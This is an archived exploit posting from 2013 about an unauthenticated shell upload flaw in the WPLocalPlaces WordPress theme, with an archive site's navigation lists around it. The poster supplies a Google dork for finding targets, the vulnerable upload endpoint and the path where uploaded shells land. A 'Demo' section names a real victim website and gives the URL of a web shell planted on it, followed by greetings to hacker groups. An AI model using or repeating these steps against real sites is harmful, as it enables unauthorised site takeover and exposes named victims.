WordPress WPLocalPlaces Shell Upload

WordPress WPLocalPlaces Shell Upload: Posted Oct 20, 2013; Authored by ovanIsmycode; The WPLocalPlaces theme for WordPress suffers from a remote shell upload vulnerability. Note that this advisory has site-specific information.; tags | exploit, remote, shell; SHA-256 | 89ac33e8669b79c978d2e7b89cd2619ce7cd11e477c404e88ae35e9004dda957; Download | Favorite | View

WordPress WPLocalPlaces Shell Upload

___________.__             _________                             _________                     
\__    ___/|  |__   ____   \_   ___ \______  ______  _  ________ \_   ___ \______  ______  _  __
  |    |   |  |  \_/ __ \  /    \  \|_  __ \/  _ \ \/ \/ /  ___/ /    \  \|_  __ \/ __ \ \/ \/ /
  |    |   |   Y  \  ___/  \     \___|  | \(  <_> )     /\___ \  \     \___|  | \|  ___/\     /
  |____|   |___|  /\___  >  \______  /__|   \____/ \/\_//____  >  \______  /__|   \___  >\/\_/ 
                \/     \/          \/                        \/          \/           \/       
                                                                                                             
INDO-PENDENT HACKER
http://thecrowscrew.org
#################################################################################################
Exploit Title  : Wordpress Themes WPLocalPlaces Upload Vulnerability
Google Dork    : inurl:"/wp-content/plugins/spotlightyour/"
Locations      : Banjarmasin, Indonesia
Author         : ovanIsmycode
Contact        : ovanismycode@yahoo.com
Software Link  : http://freelancewp.com/wordpress-theme/wp-local-places/
#################################################################################################
 
[+] POC
 
Exp. Target :
- http://domain.com/wp-content/themes/WPLocalPlaces/
 
Exploit :
- /monetize/upload/index.php
 
Shell Access :
- http://domain.com/wp-content/uploads/[year]/[month]/[search your shell].php
 
Ending :
- Fraksi Bijoug a.k.a Kalam Saheru
  Saparatoss Blank Blank
  awkwkwkwk :v
 

[+]Demo

Live Target :
http://southbayautopros.com/wp-content/themes/WPLocalPlaces/monetize/upload/index.php
see it http://i.imgur.com/3NsmWdt.jpg

Shell Access :
http://southbayautopros.com/wp-content/uploads/2013/10/13820893341435692459.php
see it http://i.imgur.com/4e8hHzA.jpg
  
#################################################################################################
  
Spec!4L th4nk'5 to :
MsconfiX, Catalyst71, Gabby, din_muh, don_ojan, DendyIsMe, kit4r0, 777r, ph_ovtl4w, adecakep7,
penjamoen, N035, -=[The Crows Crew]=-, Indonesian Hacker
 
thecrowscrew.org, hacker-newbie.org, yogyacarderlink.web.id, devilzc0de.org
 
########################################[end]####################################################

Top Authors In Last 30 Days

Red Hat 210 files
Ubuntu 64 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

WordPress WPLocalPlaces Shell Upload

WordPress WPLocalPlaces Shell Upload

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

WordPress WPLocalPlaces Shell Upload

Share This

WordPress WPLocalPlaces Shell Upload

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems